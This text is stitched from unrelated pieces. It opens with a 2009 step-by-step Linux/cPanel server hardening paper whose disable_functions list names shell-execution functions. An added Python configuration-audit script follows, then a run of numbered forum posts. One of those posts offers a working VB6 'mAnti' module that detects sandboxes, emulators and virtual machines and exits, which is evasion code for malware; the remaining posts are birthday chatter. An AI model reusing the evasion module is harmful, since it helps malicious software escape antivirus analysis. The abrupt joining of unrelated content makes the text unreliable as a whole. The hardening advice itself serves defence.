    I wrote a step by step paper on how to secure a Linux server with cP/WHM and Apache installed. By default, Linux is not secured enough, but you have to understand there is no such thing as a "totally secured server/system". The purpose of this paper is to understand how to at least provide some kind of security to the server. I prefer the lsws web server without any control panel at all, but for this paper I have used CentOS 5 with cP/WHM and the Apache web server installed, since a lot of hosting companies and individuals are using it.

    Let's start. So, you bought the server with CentOS 5 installed. If you ordered cP/WHM together with the server, you can skip step 2.1.

    ============================================
    | 2) cP/WHM installation and configuration |
    ============================================

    2.1) cP/WHM Installation

    To begin your installation, use the following commands in SSH:

    root@server [~]# cd /home
    root@server [/home]# wget http://layer1.cpanel.net/latest
    root@server [/home]# ./latest

    -----------------------------------------------------------------------------------------------------
    cd /home - Opens the /home directory
    wget http://layer1.cpanel.net/latest - Fetches the latest installation file from the cPanel servers.
    ./latest - Opens and runs the installation files.
    ------------------------------------------------------------------------------------------------------

    cP/WHM should be installed now. You should be able to access cP via http://serverip:2082 (SSL: 2083) or http://serverip/cpanel and WHM via http://serverip:2086 (SSL: 2087) or http://serverip/whm. Let's configure it now.

    2.2) cP/WHM Configuration

    Login to WHM using the root username/passwd at serverip or http://serverip/whm

    WHM - Server setup - Tweak Security:
    -------------------------------------
    Enable open_basedir protection
    Disable Compilers for all accounts (except root)
    Enable Shell Bomb/memory Protection
    Enable cPHulk Brute Force Protection

    WHM - Account Functions:
    -------------------------
    Disable cPanel Demo Mode
    Disable shell access for all accounts (except root)

    WHM - Service Configuration - FTP Configuration:
    -------------------------------------------------
    Disable anonymous FTP access

    WHM - MySQL:
    -------------
    Set some MySQL password (don't set the same password as for root access)
    - If you don't set a MySQL password and someone uploads a shell (e.g. c99) on some site on the server, he will be able to log into the DB with username "root" without a password and delete/edit/download any DB on that server

    WHM - Service Configuration - Apache Configuration - PHP and SuExec Configuration
    --------------------
    Enable suEXEC - suEXEC = On

    When PHP runs as an Apache module it executes as the user/group of the web server, which is usually "nobody" or "apache". suEXEC changes this so scripts are run as CGI. That means scripts are executed as the user that created them. With suEXEC, script permissions can't be set to 777 (read/write/execute at user/group/world level).

    ===============================================================================
    | 3) The server and its services | PHP Installation, Optimization & Security |
    ===============================================================================

    3.1) Keep all services and scripts up to date and be sure that you are running the latest secured version. On CentOS type this in SSH to upgrade/update services on the server.

    [root@server ~]# yum upgrade
    or
    [root@server ~]# yum update

    3.2) PHP Installation/Update, configuration and optimization + Suhosin patch

    First download what you need; type the following in SSH:

    root@server [~]# cd /root
    root@server [~]# wget http://www.php.net/get/php-5.2.9.tar.bz2/from/this/mirror
    root@server [~]# wget http://download.suhosin.org/suhosin-patch-5.2.8-0.9.6.3.patch.gz
    root@server [~]# wget http://download.suhosin.org/suhosin-0.9.27.tgz

    Untar PHP

    root@server [~]# tar xvjf php-5.2.9.tar.bz2

    Patch the source

    root@server [~]# gunzip < suhosin-patch-5.2.8-0.9.6.3.patch.gz | patch -p0

    Configure the source. If you want to use the same config as you used for the last PHP build, it's not a problem, but you will have to add --enable-suhosin to the old config. To get the old config, type this in SSH:

    root@server [~]# php -i | grep ./configure
    root@server [~]# cd php-5.2.9
    root@server [~/php-5.2.9]# ./configure --enable-suhosin + old config (add the old config you got from "php -i | grep ./configure" here)
    root@server [~/php-5.2.9]# make
    root@server [~/php-5.2.9]# make install

    Note: If you get an error like "make: command not found" or "patch: command not found", you will have to install "make" and "patch". It can be done easily. Just type this in SSH:

    root@server [~]# yum install make
    root@server [~]# yum install patch

    Now check that everything is as you want. Upload a PHP script like this to the server:

    <?php phpinfo(); ?>

    Open it in your browser and you will see your PHP configuration there.

    3.3) Suhosin

    Now we can install the suhosin patch to get better security and performance.

    root@server [~]# tar zxvf suhosin-0.9.27.tgz
    root@server [~]# cd suhosin-0.9.27
    root@server [~/suhosin-0.9.27]# phpize
    root@server [~/suhosin-0.9.27]# ./configure
    root@server [~/suhosin-0.9.27]# make
    root@server [~/suhosin-0.9.27]# make install

    After you have installed suhosin you will get something like this:

    It's installed to /usr/local/lib/php/extensions/no-debug-non-zts-20060613/

    Now edit your php.ini. If you don't know where php.ini is located, type this in SSH:

    root@server [~]# php -i | grep php.ini
    Configuration File (php.ini) Path => /usr/local/lib
    Loaded Configuration File => /usr/local/lib/php.ini

    It means you have to edit /usr/local/lib/php.ini. Type in SSH:

    root@server [~]# nano /usr/local/lib/php.ini

    If you get the error "nano: command not found", then:

    root@server [~]# yum install nano

    Find "extension_dir =" and add:

    extension_dir = /usr/local/lib/php/extensions/no-debug-non-zts-20060613/

    To save it, press CTRL + O and then Enter.

    3.4) We will install Zend Optimizer to get better performance:

    Download Zend Optimizer from Zend Guard - Protect Your IP & Generate More Revenue - Zend.com

    root@server [~]# tar -zxvf ZendOptimizer-3.3.3-linux-glibc23-i386.tar.gz
    root@server [~]# cd ZendOptimizer-3.3.3-linux-glibc23-i386
    root@server [~/ZendOptimizer-3.3.3-linux-glibc23-i386]# ./install.sh

    Welcome to Zend Optimizer installation..... - Press Enter
    Zend licence agreement... - Press Enter
    Do you accept the terms of this licence... - Yes, press Enter
    Location of Zend Optimizer... - /usr/local/Zend, press Enter
    Confirm the location of your php.ini file... - /usr/local/lib, press Enter
    Are you using Apache web-server... - Yes, press Enter
    Specify the full path to the Apache control utility (apachectl)... - /usr/local/apache/bin/apachectl, press Enter
    The installation has completed successfully... - Press Enter

    Now restart Apache; type this in SSH:

    root@server [~]# service httpd restart

    3.5) php.ini & disabled functions

    Edit php.ini like this:

    root@server [~]# nano /usr/local/lib/php.ini
    ------------------------------------------------------------
    safe_mode = On
    expose_php = Off
    enable_dl = Off
    magic_quotes_gpc = On
    register_globals = Off
    display_errors = Off
    disable_functions = system, show_source, symlink, exec, dl, shell_exec, passthru, phpinfo, escapeshellarg, escapeshellcmd
    -------------------------------------------------------------
    root@server [~]# service httpd restart

    Or you can edit php.ini via WHM: WHM - Service Configuration - PHP Configuration Editor

    =========================================================
    | 4) Kernel Hardening | Linux Kernel + Grsecurity Patch |
    =========================================================

    Description: grsecurity is an innovative approach to security utilizing a multi-layered detection, prevention, and containment model. It is licensed under the GPL. It offers, among many other features:

    - An intelligent and robust Role-Based Access Control (RBAC) system that can generate least privilege policies for your entire system with no configuration
    - Change root (chroot) hardening
    - /tmp race prevention
    - Extensive auditing
    - Prevention of arbitrary code execution, regardless of the technique used (stack smashing, heap corruption, etc)
    - Prevention of arbitrary code execution in the kernel
    - Randomization of the stack, library, and heap bases
    - Kernel stack base randomization
    - Protection against exploitable null-pointer dereference bugs in the kernel
    - Reduction of the risk of sensitive information being leaked by arbitrary-read kernel bugs
    - A restriction that allows a user to only view his/her processes
    - Security alerts and audits that contain the IP address of the person causing the alert

    Downloading and patching the kernel with grsecurity

    root@server [~]# cd /root
    root@server [~]# wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.26.5.tar.gz
    root@server [~]# wget http://www.grsecurity.com/test/grsecurity-2.1.12-2.6.26.5-200809141715.patch
    root@server [~]# tar xzvf linux-2.6.26.5.tar.gz
    root@server [~]# patch -p0 < grsecurity-2.1.12-2.6.26.5-200809141715.patch
    root@server [~]# mv linux-2.6.26.5 linux-2.6.26.5-grsec
    root@server [~]# ln -s linux-2.6.26.5-grsec/ linux
    root@server [~]# cd linux
    root@server [~/linux]# cp /boot/config-`uname -r` .config
    root@server [~/linux]# make oldconfig

    Compile the kernel:

    root@server [~/linux]# make bzImage
    root@server [~/linux]# make modules
    root@server [~/linux]# make modules_install
    root@server [~/linux]# make install

    Check your GRUB loader config, and make sure default is 0

    root@server [~/linux]# nano /boot/grub/grub.conf

    Reboot the server

    root@server [~/linux]# reboot

    ==========
    | 5) SSH |
    ==========

    In order to change the SSH port and protocol you will have to edit sshd_config

    root@server [~]# nano /etc/ssh/sshd_config

    Change "Protocol 2,1" to "Protocol 2"
    Change "#Port 22" to some other port and uncomment it, like "Port 1337"

    There are a lot of script kiddies with brute forcers and they will try to crack our SSH pass because they know the username is root and the port is 22. But we were smarter, we have changed the SSH port. Also, their "brute forcing" can increase server load, which means our sites (hosted on that server) will be slower.

    SSH Legal Message

    Edit /etc/motd and write in motd something like this:
    "ALERT! That is a secured area. Your IP is logged. Administrator has been notified"

    When someone logs into SSH he will see that message:
    ALERT! That is a secured area. Your IP is logged. Administrator has been notified

    If you want to receive an email every time someone logs into SSH as root, edit .bash_profile (it's located in the /root directory) and put this at the end of the file:

    echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access from `who | awk '{print $6}'`" mail@something.com

    And at the end restart SSH: type "service sshd restart" in SSH

    =================================
    | 6) Firewall | DDoS Protection |
    =================================

    6.1) Firewall, CSF Installation

    root@server [~]# wget http://www.configserver.com/free/csf.tgz
    root@server [~]# tar -xzf csf.tgz
    root@server [~]# cd csf

    In order to install csf your server needs to have some iptables modules enabled. csftest is a Perl script and it comes with csf. You can check those modules with it.

    root@server [~/csf]# ./csftest.pl

    The output should be like this:

    root@server [~/csf]# ./csftest.pl
    Testing ip_tables/iptable_filter...OK
    Testing ipt_LOG...OK
    Testing ipt_multiport/xt_multiport...OK
    Testing ipt_REJECT...OK
    Testing ipt_state/xt_state...OK
    Testing ipt_limit/xt_limit...OK
    Testing ipt_recent...OK
    Testing ipt_owner...OK
    Testing iptable_nat/ipt_REDIRECT...OK

    No worries if you don't have all those modules enabled; csf will work if you didn't get any FATAL errors at the end of the output.

    Now, get to the installation

    root@server [~/csf]# ./install.sh

    You will have to edit the csf.conf file. It's located here: /etc/csf/csf.conf

    You need to edit it like this:

    TESTING = "0"

    And you have to configure the open ports in csf.conf or you won't be able to access these ports. In most cases it should be configured like this if you are using cP/WHM. If you are running something on some other port you will have to enable it here. If you changed the SSH port you will have to enable the new port here:

    # Allow incoming TCP ports
    TCP_IN = "20,21,22,25,53,80,110,143,443,465,587,993,995,2077,2078,2082,2083,2086,2087,2095,2096"

    # Allow outgoing TCP ports
    TCP_OUT = "20,21,22,25,37,43,53,80,110,113,443,587,873,2087,2089,2703"

    6.2) CSF Connection Limit

    There is a CT option in csf.conf; configure it like this:

    CT_LIMIT = "200"
    It means every IP with more than 200 connections is going to be blocked.

    CT_PERMANENT = "1"
    The IP will be blocked permanently.

    CT_BLOCK_TIME = "1800"
    The IP will be blocked for 1800 secs (1800 secs = 30 mins).

    CT_INTERVAL = "60"
    Set this to the number of seconds between connection tracking scans.

    After editing csf.conf you need to restart csf

    root@server [~]# service csf restart

    6.3) SYN Cookies

    Edit the /etc/sysctl.conf file and add the following line in order to enable SYN cookies protection:
    -----------------------------------
    # Enable TCP SYN Cookie Protection
    net.ipv4.tcp_syncookies = 1
    -----------------------------------
    root@server [~/]# service network restart

    6.4) CSF as a security testing tool

    CSF has an option "Server Security Check". Go to WHM - Plugins - CSF - Test Server Security. You will see additional steps on how to secure the server even more. I'm writing only about the most important things here and I covered most of them in the paper, but if you want you can follow the steps provided by CSF to get the server even more secured.

    6.5) Mod_Evasive

    The ModEvasive module for Apache offers protection against DDoS (denial of service attacks) on your server. To install it, log into SSH and type
    ---------------------------------------------------------------------------------
    root@server [~]# cd /root/
    root@server [~]# wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
    root@server [~]# tar zxf mod_evasive_1.10.1.tar.gz
    root@server [~]# cd mod_evasive

    then type...

    root@server [~/mod_evasive]# /usr/sbin/apxs -cia mod_evasive20.c
    ---------------------------------------------------------------------------------

    When mod_evasive is installed, place the following lines in your httpd.conf (/etc/httpd/conf/httpd.conf)
    --------------------------------
    <IfModule mod_evasive20.c>
        DOSHashTableSize 3097
        DOSPageCount 2
        DOSSiteCount 50
        DOSPageInterval 1
        DOSSiteInterval 1
        DOSBlockingPeriod 10
    </IfModule>
    --------------------------------

    6.6) Random things:

    csf -d IP - Block an IP with CSF
    csf -dr IP - Unblock an IP with CSF
    csf -s - Start firewall rules
    csf -f - Flush/stop firewall rules
    csf -r - Restart firewall rules
    csf -x - Disable CSF
    csf -e - Enable CSF
    csf -c - Check for updates
    csf -h - Show help screen

    - Block an IP via iptables
    iptables -A INPUT -s 208.131.183.169 -j DROP

    - Unblock an IP via iptables
    iptables -I INPUT -s IP -j ACCEPT

    - See how many IP addresses are connected to the server and how many connections each of them has.
    netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

    ===================
    | 7) Mod_Security |
    ===================

    Mod_Security is a web application firewall and it can help us to secure our sites against RFI, LFI, XSS, SQL Injection etc. If you use cP/WHM you can easily enable Mod_Security in WHM - Plugins - Enable Mod_Security and save.

    Now I will explain how to install Mod_Security from source. You can't install Mod_Security if you don't have the libxml2 and httpd-devel libraries. Also, you need to enable mod_unique_id in the Apache modules, but don't worry, I will explain how to do it.

    Log into SSH and type...

    root@server [~]# yum install libxml2 libxml2-devel httpd-devel

    libxml2, libxml2-devel and httpd-devel should be installed now. Then you need to edit the httpd.conf file; you can find it here:

    root@server [~]# nano /etc/httpd/conf/httpd.conf

    You need to add this in your httpd.conf file:

    LoadModule unique_id_module modules/mod_unique_id.so

    Now download the latest version of mod_security for apache2 from ModSecurity: Open Source Web Application Firewall

    Log into SSH and type...

    root@server [~]# cd /root/
    root@server [~]# wget SourceForge.net: ModSecurity: Downloading ...
    root@server [~]# tar zxf modsecurity-apache_2.5.6.tar.gz
    root@server [~]# cd modsecurity-apache_2.5.6
    root@server [~/modsecurity-apache_2.5.6]# cd apache2

    then type:

    root@server [~/modsecurity-apache_2.5.6/apache2]# ./configure
    root@server [~/modsecurity-apache_2.5.6/apache2]# make
    root@server [~/modsecurity-apache_2.5.6/apache2]# make install

    Go to the end of httpd.conf and place an include for our config/rules file...

    Include /etc/httpd/conf/modsecurity.conf
    ---------------------------------------------------------
    # /etc/httpd/conf/httpd.conf
    LoadModule unique_id_module modules/mod_unique_id.so
    LoadFile /usr/lib/libxml2.so
    LoadModule security2_module modules/mod_security2.so
    Include /etc/httpd/conf/modsecurity.conf
    ---------------------------------------------------------

    You need to find good rules for Mod_Security. You can find them at the official Mod_Security site. Also, give the gotroot.com rules a try. When you find good rules, just put them in /etc/httpd/conf/modsecurity.conf and restart httpd at the end: type "service httpd restart" in SSH.

    ==========================
    | 8) Anti-Virus - ClamAV |
    ==========================

    You need AV protection to protect the server against worms and trojans invading your mailbox and files! Just install clamav (a free open source antivirus software for Linux). More information can be found on the clamav website - Clam AntiVirus

    In order to install ClamAV log into SSH and type

    root@server [~]# yum install clamav

    Once you have installed clamav on your CentOS, here are some basic commands you will need:

    Update the antivirus database
    root@server [~]# freshclam

    Run antivirus
    root@server [~]# clamscan -r /home

    Running as a Daily Cron Job

    To run antivirus as a cron job (automatically scan daily) just run crontab -e from your command line. Then add the following line and save the file.

    @daily clamscan -r /home

    It means clamav will be scanning the /home directory every day. You can change the folder to whatever you want to scan.

    ==============
    | 9) Rootkit |
    ==============

    A rootkit scanner is a scanning tool to ensure you are about 99.9%* clean of nasty tools. This tool scans for rootkits, backdoors and local exploits by running tests like:
    - MD5 hash compare
    - Look for default files used by rootkits
    - Wrong file permissions for binaries
    - Look for suspected strings in LKM and KLD modules
    - Look for hidden files
    - Optional scan within plaintext and binary files

    Installation: Log into SSH and type

    root@server [~]# cd /root/
    root@server [~]# wget http://downloads.rootkit.nl/rkhunter-1.2.7.tar.gz
    root@server [~]# tar -zxvf rkhunter-1.2.7.tar.gz
    root@server [~]# cd rkhunter-1.2.7
    root@server [~/rkhunter-1.2.7]# ./installer.sh

    Scan the server with rkhunter

    root@server [~]# rkhunter -c

    =========================
    | 10) The Rest of Shits |
    =========================

    10.1) Random suggestions

    If you use the bind DNS server then we need to edit the named.conf file. named.conf is located here: /etc/named.conf. Add "recursion no;" under options:
    ----------------------------
    options {
        recursion no;
    ----------------------------

    Now restart bind; type in SSH

    root@server [~]# service named restart

    This will prevent lookups from dnstools.com and similar services and reduce server load.

    In order to prevent IP spoofing, you need to edit the host.conf file like this. This file is located here: /etc/host.conf. Add this in host.conf:
    ------------------
    order bind,hosts
    nospoof on
    ------------------

    Hide the Apache version number: edit httpd.conf (/etc/httpd/conf/httpd.conf)
    -----------------------
    ServerSignature Off
    -----------------------

    Disable telnet: Edit the file /etc/xinetd.d/telnet
    ------------------
    disable = yes
    ------------------

    10.2) Passwords

    Don't use the same password you are using for the server in other places. When the datacenter contacts you via e-mail or phone, always request more information. Remember, someone else could contact you to get some information or even root passwords.

    10.3) Random thoughts

    No matter what, you need to secure the server; don't think you are safe only because you are not personally involved in any shit with "hackers". When you are hosting hacking/warez related sites you are the target. There is no such thing as a totally secured server. The most important things are backups; make sure you will always have up-to-date offsite backups ^^

    Anyhow, this is the end of my paper. I hope it will help you to get some kind of security for your server.

    -Krun!x

    # milw0rm.com [2009-06-29]
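The settings the paper asks for in 3.5 (php.ini), 5 (sshd_config) and 6.3 (sysctl.conf), turned into a configuration audit. This is an added example, not part of Krun!x's paper; the sample file contents are constructed, and the function and constant names are mine.

```python
"""Added example (not part of Krun!x's paper): audit configuration text against
the settings the paper asks for in 3.5 (php.ini), 5 (sshd_config) and 6.3
(sysctl.conf). The sample files below are constructed for the demonstration;
pass the contents of the real files to audit() to check a server."""

# Directive -> value the paper sets (compared case-insensitively)
PHP_EXPECTED = {"safe_mode": "on", "expose_php": "off", "enable_dl": "off",
                "register_globals": "off", "display_errors": "off"}
PHP_DISABLE = {"system", "show_source", "symlink", "exec", "dl", "shell_exec",
               "passthru", "phpinfo", "escapeshellarg", "escapeshellcmd"}


def parse_directives(text: str, first_wins: bool = False) -> dict:
    """Parse 'key = value' (php.ini, sysctl.conf) and 'Key value' (sshd_config) lines.
    '#' and ';' comments and blank lines are skipped. php.ini and sysctl keep the
    last occurrence of a repeated key; sshd keeps the first, hence first_wins."""
    out = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        sep = "=" if "=" in line else " "
        key, _, value = line.partition(sep)
        key, value = key.strip().lower(), value.strip().strip('"')
        if first_wins and key in out:
            continue
        out[key] = value
    return out


def audit(php_ini: str, sshd_config: str, sysctl_conf: str) -> list:
    """Return one finding per deviation from the paper; an empty list means all good."""
    findings = []
    php = parse_directives(php_ini)
    for key, want in PHP_EXPECTED.items():
        if php.get(key, "").lower() != want:
            findings.append("php.ini: %s should be %s (got %r)" % (key, want, php.get(key)))
    disabled = {f.strip() for f in php.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(PHP_DISABLE - disabled)
    if missing:
        findings.append("php.ini: disable_functions is missing " + ", ".join(missing))

    sshd = parse_directives(sshd_config, first_wins=True)
    if sshd.get("protocol") != "2":
        findings.append("sshd_config: Protocol should be set to 2 (got %r)" % sshd.get("protocol"))
    if sshd.get("port", "22") == "22":      # a commented-out '#Port 22' still means port 22
        findings.append("sshd_config: Port is still 22")

    sysctl = parse_directives(sysctl_conf)
    if sysctl.get("net.ipv4.tcp_syncookies") != "1":
        findings.append("sysctl.conf: net.ipv4.tcp_syncookies should be 1")
    return findings


# Constructed sample inputs: a stock-looking server and one edited as the paper says.
WEAK_PHP_INI = """; constructed sample php.ini
safe_mode = Off
expose_php = On
display_errors = On
disable_functions = show_source, symlink
"""
HARD_PHP_INI = """; constructed sample php.ini
safe_mode = On
expose_php = Off
enable_dl = Off
register_globals = Off
display_errors = Off
disable_functions = system, show_source, symlink, exec, dl, shell_exec, passthru, phpinfo, escapeshellarg, escapeshellcmd
"""
WEAK_SSHD = "#Port 22\nProtocol 2,1\n"
HARD_SSHD = "Port 1337\nProtocol 2\n"
WEAK_SYSCTL = "net.ipv4.ip_forward = 0\n"
HARD_SYSCTL = "# Enable TCP SYN Cookie Protection\nnet.ipv4.tcp_syncookies = 1\n"

if __name__ == "__main__":
    for finding in audit(WEAK_PHP_INI, WEAK_SSHD, WEAK_SYSCTL):
        print(finding)
```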
  15. I haven't done anything like that in a long time. I thought it was "high" level, since the answer was requested.
  16. Nytro

    [VB6] mAnti

    This module will detect most of the sandboxes and virtual machines out there. It's the biggest ANTI-module out there.

    '---------------------------------------------------------------------------------------
    ' Module      : mAnti
    ' DateTime    : 29/06/2009 15:59
    ' Author      : SqUeEzEr
    ' Mail        : scott_van_dinter@hotmail.com
    ' Purpose     : Detect most of the AV's
    '               by: Usernames
    '                   Computernames
    '                   Loaded Dll's
    '                   HardDrive Names
    '                   Windows Serials
    '                   Emulators
    '
    ' Usage       : At your own risk
    ' Requirements: None
    ' Distribution: You can freely use this code in your own
    '               applications, but you may not reproduce
    '               or publish this code on any web site,
    '               online service, or distribute as source
    '               on any media without express permission.
    '
    ' History     : 29/06/2009 Created......................................................
    '---------------------------------------------------------------------------------------
    Option Explicit

    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As Long
    Private Declare Function GetTickCount Lib "kernel32" () As Long
    Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
    Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
    Private Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
    Private Declare Sub Sleep Lib "kernel32" (ByVal lngMilliseconds As Long)
    Private Declare Sub ExitProcess Lib "kernel32" (ByVal uExitCode As Long)

    Public Sub sAnti()
        Dim aUsers(6) As String
        Dim aComputers(3) As String
        Dim aDlls(1) As String
        Dim aHDDs(3) As String
        Dim aSerials(1) As String
        Dim sUser As String * 255
        Dim sComputer As String * 255
        Dim sWinSerial As String
        Dim bFound As Boolean
        Dim lBefore As Long
        Dim lAfter As Long
        Dim lhKey As Long
        Dim sBuffer As String
        Dim lLen As Long
        Dim i As Long
        Dim oSet As Object
        Dim oObj As Object

        'initialize strings and arrays
        aUsers(0) = "Sndbx"
        aUsers(1) = "tester"
        aUsers(2) = "panda"
        aUsers(3) = "currentuser"
        aUsers(4) = "Schmidti"
        aUsers(5) = "andy"
        aUsers(6) = "Andy"
        aComputers(0) = "AUTO"
        aComputers(1) = "VMLOG"
        aComputers(2) = "NONE-DUSEZ"
        aComputers(3) = "XPSP3"
        aDlls(0) = "SbieDll.dll"
        aDlls(1) = "dbghelp.dll"
        aHDDs(0) = "*VIRTUAL*"
        aHDDs(1) = "*VMWARE*"
        aHDDs(2) = "*VBOX*"
        aHDDs(3) = "*QEMU*"
        aSerials(0) = "55274-339-6006333-22900"
        aSerials(1) = "76487-OEM-0065901-82986"
        sUser = Environ("username")
        sComputer = Environ("computername")

        'Username Detections
        For i = 0 To UBound(aUsers)
            If Left(sUser, Len(aUsers(i))) = aUsers(i) Then bFound = True
        Next i

        'Computername Detections
        For i = 0 To UBound(aComputers)
            If Left(sComputer, Len(aComputers(i))) = aComputers(i) Then bFound = True
        Next i

        'Dll Detections
        For i = 0 To UBound(aDlls)
            If GetModuleHandleA(aDlls(i)) Then bFound = True
        Next i

        'Emulator Detections, Method by ChainCoder
        lBefore = GetTickCount
        Sleep 510
        lAfter = GetTickCount
        If (lAfter - lBefore) < 500 Then bFound = True

        'HardDrive Detections, Method by Cobein
        If RegOpenKeyExA(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", 0, &H20019, lhKey) = 0 Then
            sBuffer = Space$(255): lLen = 255
            If RegQueryValueExA(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then
                sBuffer = UCase(Left$(sBuffer, lLen - 1))
                For i = 0 To UBound(aHDDs)
                    If sBuffer Like aHDDs(i) Then bFound = True
                Next i
            End If
            Call RegCloseKey(lhKey)
        End If

        'Windows Serial Detections
        On Error Resume Next
        Set oSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf(Split("Win32_OperatingSystem,SerialNumber", ",")(0))
        sWinSerial = ""
        For Each oObj In oSet
            sWinSerial = oObj.Properties_(Split("Win32_OperatingSystem,SerialNumber", ",")(1)) 'Property value
            sWinSerial = Trim(sWinSerial)
        Next
        For i = 0 To UBound(aSerials)
            If sWinSerial = aSerials(i) Then bFound = True
        Next i

        'Final check
        If bFound = True Then ExitProcess (0)
    End Sub

    Credits for the anti emulator idea: ChainCoder
    Credits for the Drive Model Name: Cobein
  17. I want to write an article for beginners explaining how things work, and have newcomers be "forced" to read it. Well, I say I'll do a lot but I never do anything.
  18. Nytro

    La la la

    It was super cool. Women, manele, booze... What else was needed?
  19. Nytro

    La la la

    Thanks. I'm not celebrating anymore... I drank 2 liters of juice and my stomach hurts. But I have everything... I still have booze too (I bought 30 beers and after we came back from the barbecue, my dad goes out on the balcony and says: "Well now, I bought 30 beers and now we have 41"). I also have wine and liqueur and cognac and champagne. The hard liquor got drunk. I'm happy I didn't get drunk. I think if I had gotten drunk I would have gone fishing, because one guy started, after he got drunk: "Come on, let's go fishing, you know how well the fish bite at night?"
  20. Nytro

    La la la

    Thanks guys. Oh, yes. I did NOT get drunk at my own 18th birthday party, I only got tipsy.
  21. Nytro

    La la la

    Oh, how you all love me <'> It was raining this morning and I didn't think we'd go to the barbecue; I hope the weather clears up so we can go.
  22. Nytro

    La la la

    Thanks guys. Today I only drank one beer, which I bought myself. We'll see what I do tomorrow.
  23. Nytro

    La la la

    Wooo, 10 birthday wishes overnight, how people love me. I love you all too <'> even if I hand out a warn here and a ban there... Well, what can you do, that's my job. Today and tomorrow you can do whatever you want, swear as much as you want, go offtopic until your fingers fall off. I'm saving the drinking for tomorrow. In theory I don't want to get (badly) drunk, I keep telling myself I won't get drunk, I won't get drunk... But I don't really think I can hold out dry... Thanks guys